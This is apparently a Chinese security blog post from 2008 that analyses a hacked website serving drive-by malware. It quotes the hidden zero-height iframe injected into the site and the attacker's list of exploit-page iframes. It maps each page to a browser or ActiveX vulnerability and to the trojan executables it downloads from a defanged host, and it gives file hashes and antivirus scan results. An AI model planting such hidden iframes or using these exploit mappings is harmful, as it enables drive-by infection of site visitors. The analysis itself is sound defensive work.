某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等

最新推荐文章于 2021-11-12 17:46:27 发布

紫郢剑侠

最新推荐文章于 2021-11-12 17:46:27 发布

阅读量2.8k

点赞数

分类专栏：系统安全文章标签： microsoft structure c file office dos

本文链接：https://blog.csdn.net/Purpleendurer/article/details/2888855

版权

系统安全专栏收录该内容

368 篇文章 2 订阅

订阅专栏

某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等

该网网页包含代码：
/---
＜iframe. src=hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm width=1 height=0＞＜/iframe＞
---/

#1 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm 包含代码：
/---
＜iframe. src="ms08001.htm" width=100 height=0＞＜/iframe＞
＜iframe. src="CcXpsp.htm" width=100 height=0＞＜/iframe＞
＜iframe. src="CcIE.htm" width=100 height=0＞＜/iframe＞
＜iframe. src="baidu.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="bfyy.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="cx.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="JetAudio.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="lz.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="Media.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="ms06014.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="ms06042.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="ms07017.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="ms07027.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="ms07033.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="ms07055.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="Office.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="Opera.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="qvld.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="real.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="Baidu.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="Ruising.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="Ruising.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="Thunder.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="TTplayer.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="uc.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="xlkk.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="sinatv.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="icyfox.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="icyfox1.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="jetaudio.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="media.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="bfyy1.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="06014.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="sina.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="08011.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="ls1.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="lsx.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="xunlei5.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="real11.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="office08.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="systrsy.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="hy.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="niu.htm" width=10 height=0＞＜/iframe＞
＜iframe. src="MsVs.htm" width=10 height=0＞＜/iframe＞
---/

利用 ms06-014漏洞下载 hxxp://ruan*jian2008.cn/xzz.exe

#1.2 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/CcXpsp.htm

利用ms06-014漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

文件说明符 : D:/test/xzz.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-4 16:24:37
修改时间 : 2008-9-4 16:24:38
大小 : 45056 字节 44.0 KB
MD5 : 9f1d0331e7d9bb3e6a14f3d77e354890
SHA1: 78FE5A93EDAFFEA072239A8BE60106B054DB667D
CRC32: 2316933b

文件 xzz.exe 接收于 2008.09.04 10:33:08 (CET) 结果: 13/36 (36.12%)

反病毒引擎	版本	最后更新	扫描结果
AhnLab-V3	2008.9.3.0	2008.09.04	-
AntiVir	7.8.1.28	2008.09.04	TR/Dropper.Gen
Authentium	5.1.0.4	2008.09.03	W32/Heuristic-KPP!Eldorado
Avast	4.8.1195.0	2008.09.03	Win32:Trojan-gen {Other}
AVG	8.0.0.161	2008.09.03	Generic11.NRC
BitDefender	7.2	2008.09.04	-
CAT-QuickHeal	9.50	2008.09.02	-
ClamAV	0.93.1	2008.09.04	-
DrWeb	4.44.0.09170	2008.09.04	MULDROP.Trojan
eSafe	7.0.17.0	2008.09.03	-
eTrust-Vet	31.6.6066	2008.09.03	-
Ewido	4.0	2008.09.03	-
F-Prot	4.4.4.56	2008.09.03	W32/Heuristic-KPP!Eldorado
F-Secure	8.0.14332.0	2008.09.04	-
Fortinet	3.14.0.0	2008.09.03	-
GData	19	2008.09.04	Win32:Trojan-gen
Ikarus	T3.1.1.34.0	2008.09.04	-
K7AntiVirus	7.10.439	2008.09.03	-
Kaspersky	7.0.0.125	2008.09.04	-
McAfee	5376	2008.09.03	-
Microsoft	1.3903	2008.09.04	-
NOD32v2	3413	2008.09.04	-
Norman	5.80.02	2008.09.03	W32/Smalldrp.AIHN
Panda	9.0.0.4	2008.09.03	Suspicious file
PCTools	4.4.2.0	2008.09.03	-
Prevx1	V2	2008.09.04	-
Rising	20.60.30.00	2008.09.04	RootKit.Win32.RESSDT.dr
Sophos	4.33.0	2008.09.04	Mal/Dropper-AB
Sunbelt	3.1.1582.1	2008.09.02	-
Symantec	10	2008.09.04	Downloader
TheHacker	6.3.0.8.072	2008.09.04	-
TrendMicro	8.700.0.1004	2008.09.04	-
VBA32	3.12.8.4	2008.09.03	-
ViRobot	2008.9.2.1361	2008.09.03	-
VirusBuster	4.5.11.0	2008.09.03	-
Webwasher-Gateway	6.6.2	2008.09.04	Trojan.Dropper.Gen

附加信息
File size: 45056 bytes
MD5...: 9f1d0331e7d9bb3e6a14f3d77e354890
SHA1..: 78fe5a93edaffea072239a8be60106b054db667d
SHA256: 55ddfc834c2170e434106f08515bf54ec15522fec51c2e2a7a07bfd182e7233d
SHA512: 446b2f5a017f28ab441b902975882b146164087aebec12e3f818af07e528c43f 2baf6e3610ef374da195bb591e316088afe88f11d25467bfe8557357f78cbd7c
PEiD..: Armadillo v1.71
TrID..: File type identification Win32 Executable MS Visual C++ (generic) (65.2%) Win32 Executable Generic (14.7%) Win32 Dynamic Link Library (generic) (13.1%) Generic Win/DOS Executable (3.4%) DOS Executable Generic (3.4%)
PEInfo: PE Structure information ( base data ) entrypointaddress.: 0x40197e timedatestamp.....: 0x48b2db0b (Mon Aug 25 16:17:15 2008) machinetype.......: 0x14c (I386) ( 4 sections ) name viradd virsiz rawdsiz ntrpy md5 .text 0x1000 0xb4a 0x1000 4.79 bae3f2b4fb31bd91eb6b567fc5eaf2f8 .rdata 0x2000 0x79a 0x1000 2.96 c19fb51c229fa86b387eb1bc55d78c2e .data 0x3000 0x184 0x1000 0.66 9195ceb5daf1d9cd01606e8ba9348640 .rsrc 0x4000 0x6f40 0x7000 2.83 6baf7034b48f7e8fa0dcae86e4d44413 ( 5 imports ) > KERNEL32.dll: CreateRemoteThread, GetProcAddress, GetModuleHandleA, WriteProcessMemory, VirtualAllocEx, lstrlenA, OpenProcess, ResumeThread, CreateProcessA, SetThreadPriority, GetCurrentThread, SetPriorityClass, lstrcatA, lstrcpyA, CreateToolhelp32Snapshot, GetShortPathNameA, GetModuleFileNameA, CloseHandle, SetFileTime, WriteFile, GetFileTime, CreateFileA, GlobalFree, LockResource, GlobalAlloc, LoadResource, SizeofResource, FindResourceA, WinExec, Process32First, Process32Next, GetCurrentProcess, GetSystemDirectoryA, Sleep, GetEnvironmentVariableA, GetStartupInfoA > ADVAPI32.dll: RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegQueryValueExA > MFC42.DLL: -, -, -, - > MSVCRT.dll: exit, _acmdln, __getmainargs, tolower, __setusermatherr, _XcptFilter, __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp, _exit, _onexit, __dllonexit, _adjust_fdiv, __CxxFrameHandler, _initterm > MSVCP60.dll: __0_Winit@std@@QAE@XZ, __1Init@ios_base@std@@QAE@XZ, __0Init@ios_base@std@@QAE@XZ, __1_Winit@std@@QAE@XZ ( 0 exports )

#1.3 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/CcIE.htm

利用ms06-014漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

#1.4 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/baidu.htm

利用BaiDu工具条（CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}）下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe

#1.5 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/bfyy.htm

利用暴风影音（clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB）漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe

文件说明符 : D:/test/4.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-4 16:43:49
修改时间 : 2008-9-4 16:46:30
大小 : 2222080 字节 2.122 MB
MD5 : 94ac223a30d22e18c24881e7e95728bc
SHA1: 5731768C4240D9912F02DF6AA8352B8F3F803866
CRC32: 7ec6399b

采用文件夹图标

文件 4.rar 接收于 2008.09.04 11:01:42 (CET) 结果: 12/36 (33.34%)

反病毒引擎	版本	最后更新	扫描结果
AhnLab-V3	2008.9.3.0	2008.09.04	-
AntiVir	7.8.1.28	2008.09.04	TR/Hijacker.Gen
Authentium	5.1.0.4	2008.09.03	-
Avast	4.8.1195.0	2008.09.03	Win32:Trojan-gen {Other}
AVG	8.0.0.161	2008.09.03	PSW.Generic6.SCG
BitDefender	7.2	2008.09.04	Dropped:Trojan.PWS.QQPass.NEG
CAT-QuickHeal	9.50	2008.09.02	-
ClamAV	0.93.1	2008.09.04	-
DrWeb	4.44.0.09170	2008.09.04	MULDROP.Trojan
eSafe	7.0.17.0	2008.09.03	-
eTrust-Vet	31.6.6069	2008.09.04	-
Ewido	4.0	2008.09.03	-
F-Prot	4.4.4.56	2008.09.03	W32/Agent.S.gen!Eldorado
F-Secure	8.0.14332.0	2008.09.04	-
Fortinet	3.14.0.0	2008.09.03	-
GData	19	2008.09.04	-
Ikarus	T3.1.1.34.0	2008.09.04	Trojan-PWS.Win32.QQPass.pb
K7AntiVirus	7.10.439	2008.09.03	-
Kaspersky	7.0.0.125	2008.09.04	-
McAfee	5376	2008.09.03	-
Microsoft	1.3903	2008.09.04	TrojanDropper:Win32/Delfdru.gen!A
NOD32v2	3413	2008.09.04	-
Norman	5.80.02	2008.09.03	-
Panda	9.0.0.4	2008.09.03	Suspicious file
PCTools	4.4.2.0	2008.09.03	-
Prevx1	V2	2008.09.04	-
Rising	20.60.30.00	2008.09.04	-
Sophos	4.33.0	2008.09.04	Mal/Behav-043
Sunbelt	3.1.1592.1	2008.08.30	-
Symantec	10	2008.09.04	-
TheHacker	6.3.0.8.072	2008.09.04	-
TrendMicro	8.700.0.1004	2008.09.04	-
VBA32	3.12.8.4	2008.09.02	MalwareScope.Trojan-PSW.Game.16
ViRobot	2008.9.2.1361	2008.09.03	-
VirusBuster	4.5.11.0	2008.09.03	-
Webwasher-Gateway	6.6.2	2008.09.04	Trojan.Hijacker.Gen

附加信息
File size: 1836884 bytes
MD5...: f90b42115323b398c54001a94623b3de
SHA1..: 81d454d14047adc008d36954c2385d1e0388d7bc
SHA256: a3edb0fa4d5996ee2d9275c72de6bf980b1fbb223a5d779007f54d8f66cb67b3
SHA512: 4096d3f11e30f747f90a7e7027bc50cdfc3b97a892daa24c0c1bbff151c500bb 5a92632320e01aeaf869babb8b48af17eb0c8c595ccfabd940d7f95b1ca2741e
PEiD..: -
TrID..: File type identification RAR Archive (83.3%) REALbasic Project (16.6%)
PEInfo: -
packers (Kaspersky): UPack

#1.6 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/cx.htm

利用超星阅读器（clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2）漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe

#1.7 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/JetAudio.htm

利用韩国jetAudio播放器ActiveX（clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8）控件漏洞下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe

#1.8 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/lz.htm

利用联众世界（clsid:61F5C358-60FB-4A23-A312-D2B556620F20）漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe

#1.9 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Media.htm

利用ms07-017漏洞下载 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/wm.cur，hxxp://ruan*jian2008.*k**k*i.com/xzz.exe

#1.13 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07027.htm

利用ms07-027漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe

#1.14 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07033.htm

利用ms07-033漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe

#1.15 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07055.htm

利用ms07-055漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe

#1.16 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Office.htm

利用Microsoft Office Snapshot Viewer ActiveX（clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9）漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe

#1.17 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Opera.htm

利用Opera浏览器漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe

#1.18 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/qvld.htm
/---
文件不存在
---/

#1.19 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/real.htm

利用RealPlayer漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe

#1.20 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Ruising.htm

利用瑞星免费在线查毒OL2005.dll ActiveX控件（clsid:E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153）远程代码执行漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe

#1.21 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Thunder.htm

利用迅雷（ThunderServer.webThunder.1）漏洞下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe

#1.22 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/TTplayer.htm

利用千千静听（TTplayer）ttp_mod.dll（CLSID:89AE5F82-410A-4040-9387-68D1144EFD03）析med文件堆溢出漏洞下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe

#1.23 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/uc.htm

利用新浪UC（BROWSER2UC.BROWSERToUC）溢出漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe

#1.24 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/xlkk.htm

利用迅雷看看（clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F）漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe

#1.25 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/sinatv.htm

利用新浪DLoader Class ActiveX控件（clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A）任意文件下载漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

#1.26 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/icyfox.htm

下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

#1.27 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/icyfox1.htm

下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

#1.28 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/bfyy1.htm

利用新浪DLoader Class ActiveX控件（clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A）任意文件下载漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

#1.29 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/08011.htm

利用MS08-011漏洞（Microsoft Office .WPS File Stack Overflow Exploit，clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6）下载 hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

#1.30 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ls1.htm

利用联众世界（clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69）漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

#1.31 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/lsx.htm

利用联众世界（clsid:61F5C358-60FB-4A23-A312-D2B556620F20）漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

#1.32 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/xunlei5.htm

利用迅雷5（clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266）漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

#1.33 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/real11.htm
/---
文件不存在
---/

#1.34 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/office08.htm

利用MS Office Snapshot Viewer ActiveX（snpvw.Snapshot Viewer Control.1） Exploit 下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

#1.35 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/systrsy.htm

下载 hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe，1.exe，2.exe

文件说明符 : D:/test/1.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-31 18:15:35
修改时间 : 2008-8-31 18:15:42
大小 : 632832 字节 618.0 KB
MD5 : 83fcf34cef2699f9f29a7906f758e6d6
SHA1: 0C0E3EE9FDBC8355329CD9B5CA9FF82EF373E537
CRC32: 83590948

文件 1.exe 接收于 2008.09.02 08:22:23 (CET) 结果: 12/36 (33.34%)

反病毒引擎	版本	最后更新	扫描结果
AhnLab-V3	2008.9.2.0	2008.09.02	-
AntiVir	7.8.1.23	2008.09.01	TR/Dropper.Gen
Authentium	5.1.0.4	2008.09.02	-
Avast	4.8.1195.0	2008.09.01	Win32:Monga
AVG	8.0.0.161	2008.09.01	Pakes.L
BitDefender	7.2	2008.09.02	Trojan.Inject.GO
CAT-QuickHeal	9.50	2008.08.29	(Suspicious) - DNAScan
ClamAV	0.93.1	2008.09.02	-
DrWeb	4.44.0.09170	2008.09.01	-
eSafe	7.0.17.0	2008.09.01	-
eTrust-Vet	31.6.6062	2008.09.01	-
Ewido	4.0	2008.09.01	-
F-Prot	4.4.4.56	2008.09.02	W32/Hupigon.O.gen!Eldorado
F-Secure	7.60.13501.0	2008.09.02	-
Fortinet	3.14.0.0	2008.09.02	W32/Hupigon.GE!tr.bdr
GData	19	2008.09.02	-
Ikarus	T3.1.1.34.0	2008.09.02	Virus.Win32.Virtualizer
K7AntiVirus	7.10.435	2008.09.01	-
Kaspersky	7.0.0.125	2008.09.02	-
McAfee	5374	2008.09.01	-
Microsoft	1.3807	2008.09.02	-
NOD32v2	3406	2008.09.02	-
Norman	5.80.02	2008.09.01	-
Panda	9.0.0.4	2008.09.02	-
PCTools	4.4.2.0	2008.09.01	-
Prevx1	V2	2008.09.02	-
Rising	20.60.10.00	2008.09.02	-
Sophos	4.33.0	2008.09.02	Mal/Emogen-E
Sunbelt	3.1.1592.1	2008.08.30	VIPRE.Suspicious
Symantec	10	2008.09.02	-
TheHacker	6.3.0.8.069	2008.09.01	-
TrendMicro	8.700.0.1004	2008.09.02	Cryp_Pai-6
VBA32	3.12.8.4	2008.09.01	-
ViRobot	2008.9.1.1359	2008.09.01	-
VirusBuster	4.5.11.0	2008.09.01	-
Webwasher-Gateway	6.6.2	2008.09.01	Trojan.Dropper.Gen

附加信息
File size: 632832 bytes
MD5...: 83fcf34cef2699f9f29a7906f758e6d6
SHA1..: 0c0e3ee9fdbc8355329cd9b5ca9ff82ef373e537
SHA256: f24089c722f0c3a75486880df48be170e7ce158236fa24dcb29104aab095bc86
SHA512: c098704adc12aa51c2e58996b5cb4d9a4b7ce8f27e42a49c2e88e5fc1bbf866d 568a990515388f162672a2b1b64de1c83f9deaadf3af4f5ad497aa27afca02f8
PEiD..: ASProtect 1.33 - 2.1 Registered -> Alexey Solodovnikov
TrID..: File type identification Win32 Executable Generic (68.0%) Generic Win/DOS Executable (15.9%) DOS Executable Generic (15.9%) Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)
PEInfo: PE Structure information ( base data ) entrypointaddress.: 0x105c000 timedatestamp.....: 0x41107bc1 (Wed Aug 04 06:01:37 2004) machinetype.......: 0x14c (I386) ( 6 sections ) name viradd virsiz rawdsiz ntrpy md5 0x1000 0x5b000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e 0x5c000 0x5b000 0x58800 8.00 09ddf420c4b737f1fc0fcca9b9814128 .rsrc 0xb7000 0x1000 0x200 4.96 fc7daca374c150fdc7edf901caf58e64 0xb8000 0x1000 0x200 7.60 61676096051219ccea18f55cee2ca4a2 .data 0xb9000 0x42000 0x41800 7.91 1c2377ccc939c0ddb44bab600b4f84a7 .adata 0xfb000 0x1000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e ( 3 imports ) > kernel32.dll: GetProcAddress, GetModuleHandleA, LoadLibraryA > oleaut32.dll: VariantChangeTypeEx > kernel32.dll: RaiseException ( 0 exports )
packers (Kaspersky): PE_Patch
packers (Avast): ASProtect

文件说明符 : D:/test/2.exe
属性 : A---
数字签名:否
PE文件:是
语言 : 中文(中国)
文件版本 : 6.00.2900.3300 (xpsp.080125-2028)
说明 : Win32 Cabinet Self-Extractor
版权 : (C) Microsoft Corporation. 保留所有权利.
产品版本 : 6.00.2900.3300
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
内部名称 : Wextract
源文件名 : WEXTRACT.EXE
创建时间 : 2008-8-31 18:15:25
修改时间 : 2008-8-31 18:15:33
大小 : 740352 字节 723.0 KB
MD5 : 60ad4121a6309e439b74dc7bb749e553
SHA1: 8793BC8001E902588910C880B2BF77331F075DCE
CRC32: 2334ca4c

内含：5.exe

文件说明符 : D:/test/5.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-7-17 11:1:36
修改时间 : 2008-7-17 11:1:36
大小 : 681984 字节 666.0 KB
MD5 : 457870fa5975fdcf39ceeca5c85948e3
SHA1: E618F83981A32C5FEEA71357287F768C4B786093
CRC32: c887cd8b

文件 5.exe 接收于 2008.09.02 08:28:40 (CET)

反病毒引擎	版本	最后更新	扫描结果
AhnLab-V3	2008.9.2.0	2008.09.02	-
AntiVir	7.8.1.23	2008.09.01	TR/Crypt.XPACK.Gen
Authentium	5.1.0.4	2008.09.02	-
Avast	4.8.1195.0	2008.09.01	-
AVG	8.0.0.161	2008.09.01	-
BitDefender	7.2	2008.09.02	MemScan:Trojan.Dropper.Delf.BCB
CAT-QuickHeal	9.50	2008.08.29	(Suspicious) - DNAScan
ClamAV	0.93.1	2008.09.02	-
DrWeb	4.44.0.09170	2008.09.01	-
eSafe	7.0.17.0	2008.09.01	-
eTrust-Vet	31.6.6062	2008.09.01	-
Ewido	4.0	2008.09.01	-
F-Prot	4.4.4.56	2008.09.02	-
F-Secure	7.60.13501.0	2008.09.02	-
Fortinet	3.14.0.0	2008.09.02	-
GData	19	2008.09.02	-
Ikarus	T3.1.1.34.0	2008.09.02	-
K7AntiVirus	7.10.435	2008.09.01	-
Kaspersky	7.0.0.125	2008.09.02	-
McAfee	5374	2008.09.01	-
Microsoft	1.3807	2008.09.02	-
NOD32v2	3406	2008.09.02	-
Norman	5.80.02	2008.09.01	-
Panda	9.0.0.4	2008.09.02	Suspicious file
PCTools	4.4.2.0	2008.09.01	-
Prevx1	V2	2008.09.02	-
Rising	20.60.10.00	2008.09.02	-
Sophos	4.33.0	2008.09.02	-
Sunbelt	3.1.1592.1	2008.08.30	VIPRE.Suspicious
Symantec	10	2008.09.02	-
TheHacker	6.3.0.8.069	2008.09.01	-
TrendMicro	8.700.0.1004	2008.09.02	-
VBA32	3.12.8.4	2008.09.01	-
ViRobot	2008.9.1.1359	2008.09.01	-
VirusBuster	4.5.11.0	2008.09.01	-
Webwasher-Gateway	6.6.2	2008.09.01	Trojan.Crypt.XPACK.Gen

附加信息
File size: 681984 bytes
MD5...: 457870fa5975fdcf39ceeca5c85948e3
SHA1..: e618f83981a32c5feea71357287f768c4b786093
SHA256: f560317472a5c3e5a00c53ae04d2540135cf87406b9cd1229503f1367549193d
SHA512: fa619305dbd55713d5a640d57d3a15543a1a1afcada8d79dcc00ab57943f203a 3e5e1873576887c0984b0882568cc1050dfef1333adadbd263523a46facfaedb
PEiD..: ASProtect v1.23 RC1
TrID..: File type identification Win32 Executable Generic (58.3%) Win16/32 Executable Delphi generic (14.1%) Generic Win/DOS Executable (13.7%) DOS Executable Generic (13.6%) Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)
PEInfo: PE Structure information ( base data ) entrypointaddress.: 0x401000 timedatestamp.....: 0x2a425e19 (Fri Jun 19 22:22:17 1992) machinetype.......: 0x14c (I386) ( 11 sections ) name viradd virsiz rawdsiz ntrpy md5 0x1000 0x2000 0x1000 7.95 ec55eb6e87785a30fa30184143bc91a0 0x3000 0x1000 0x200 7.57 efaf1a6c55af1485ae16869e097ea013 0x4000 0x1000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e 0x5000 0x1000 0x400 7.81 fcb57e634f692a1157a8d2adfc19daee 0x6000 0x1000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e 0x7000 0x1000 0x200 0.20 467f29e48f3451df774e13adae5aafc2 0x8000 0x1000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e .rsrc 0x9000 0xaa000 0x60c00 8.00 6131b07e586d38ed0f7dbcf304a003fc 0xb3000 0x1000 0x200 7.54 7b2c4b8eca4448745248eb4681bc781d .data 0xb4000 0x44000 0x43e00 7.92 cc009e690231875ddd0d207c233b0c43 .adata 0xf8000 0x1000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e ( 5 imports ) > kernel32.dll: GetProcAddress, GetModuleHandleA, LoadLibraryA > advapi32.dll: GetUserNameA > shell32.dll: ShellExecuteA > oleaut32.dll: VariantChangeTypeEx > kernel32.dll: RaiseException ( 0 exports )
packers (Kaspersky): PE_Patch
packers (F-Prot): Aspack

#1.36 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/hy.htm（卡巴斯基已检测到: 木马程序 Trojan-Downloader.VBS.Psyme.fd）

利用ms06-014漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe

#1.36.1 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/huoyan.htm
/---
文件不存在
---/

#1.36.2 hxxp://www.*es**8**6.com/pic/ddb/2006692151148920.gif
/---
文件不存在
---/

紫郢剑侠

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
0
评论
某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等

某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等该网网页包含代码：/---＜iframe. src=hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm width=1 height=0＞＜/iframe＞---/#1 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm 包含代码：/---＜i
复制链接

扫一扫